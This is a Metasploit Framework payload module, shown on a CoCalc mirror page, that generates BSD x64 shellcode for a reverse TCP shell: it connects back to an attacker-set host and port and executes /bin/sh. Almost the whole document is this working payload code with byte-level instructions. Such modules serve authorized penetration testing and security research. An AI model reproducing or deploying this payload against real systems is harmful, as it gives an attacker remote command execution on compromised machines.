CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutSign UpSign In
rapid7

Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/payloads/singles/bsd/x64/shell_reverse_tcp.rb
Views: 11780
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6


7
module MetasploitModule

8


9
  CachedSize = 98

10


11
  include Msf::Payload::Single

12
  include Msf::Payload::Bsd

13
  include Msf::Sessions::CommandShellOptions

14


15
  def initialize(info = {})

16
    super(merge_info(info,

17
      'Name'          => 'BSD x64 Shell Reverse TCP',

18
      'Description'   => 'Connect back to attacker and spawn a command shell',

19
      'Author'        => [

20
        'nemo <nemo[at]felinemenace.org>',

21
        'joev' # copy pasta monkey

22
      ],

23
      'License'       => MSF_LICENSE,

24
      'Platform'      => 'bsd',

25
      'Arch'          => ARCH_X64,

26
      'Handler'       => Msf::Handler::ReverseTcp,

27
      'Session'       => Msf::Sessions::CommandShellUnix

28
    ))

29


30
    # exec payload options

31


32
    register_options(

33
      [

34
        OptString.new('CMD',   [ true,  "The command string to execute", "/bin/sh" ]),

35
        Opt::LHOST,

36
        Opt::LPORT(4444)

37
    ])

38
  end

39


40
  # build the shellcode payload dynamically based on the user-provided CMD

41
  def generate(_opts = {})

42
    lhost = datastore['LHOST'] || '127.0.0.1'

43


44
    # OptAddress allows either an IP or hostname, we only want IPv4

45
    if not Rex::Socket.is_ipv4?(lhost)

46
      raise ArgumentError, "LHOST must be in IPv4 format."

47
    end

48


49
    cmd  = (datastore['CMD'] || '') + "\x00"

50
    port = [datastore['LPORT'].to_i].pack('n')

51
    ipaddr = [lhost.split('.').inject(0) {|t,v| (t << 8 ) + v.to_i}].pack("N")

52


53
    call = "\xe8" + [cmd.length].pack('V')

54
    payload =

55
      "\x31\xc0" +                                 # xor eax,eax

56
      "\x83\xc0\x61" +                             # add eax,0x61

57
      "\x6A\x02" +                                 # push byte +0x2

58
      "\x5F" +                                     # pop rdi

59
      "\x6A\x01" +                                 # push byte +0x1

60
      "\x5E" +                                     # pop rsi

61
      "\x48\x31\xD2" +                             # xor rdx,rdx

62
      "\x0F\x05" +                                 # loadall286

63
      "\x49\x89\xC4" +                             # mov r12,rax

64
      "\x48\x89\xC7" +                             # mov rdi,rax

65
      "\x31\xc0" +                                 # xor eax,eax

66
      "\x83\xc0\x62" +                             # add eax,0x62

67
      "\x48\x31\xF6" +                             # xor rsi,rsi

68
      "\x56" +                                     # push rsi

69
      "\x48\xBE\x00\x02" + port +                  # mov rsi,0x100007fb3150200

70
      ipaddr +

71
      "\x56" +                                     # push rsi

72
      "\x48\x89\xE6" +                             # mov rsi,rsp

73
      "\x6A\x10" +                                 # push byte +0x10

74
      "\x5A" +                                     # pop rdx

75
      "\x0F\x05" +                                 # loadall286

76
      "\x4C\x89\xE7" +                             # mov rdi,r12

77
      "\x6A\x03" +                                 # push byte +0x3

78
      "\x5E" +                                     # pop rsi

79
      "\x48\xFF\xCE" +                             # dec rsi

80
      "\x6A\x5A" +                                 # push +byte 0x5a

81
      "\x58" +                                     # pop rax

82
      "\x0F\x05" +                                 # loadall286

83
      "\x75\xF6" +                                 # jne -0x8

84
      "\x31\xc0" +                                 # xor eax,eax

85
      "\x83\xc0\x3B" +                             # add eax,0x3b

86
      call +                                       # call CMD.len

87
      cmd +                                        # CMD

88
      "\x48\x8B\x3C\x24" +                         # mov rdi,[rsp]

89
      "\x48\x31\xD2" +                             # xor rdx,rdx

90
      "\x52" +                                     # push rdx

91
      "\x57" +                                     # push rdi

92
      "\x48\x89\xE6" +                             # mov rsi,rsp

93
      "\x0F\x05"                                   # loadall286

94
  end

95
end

96


97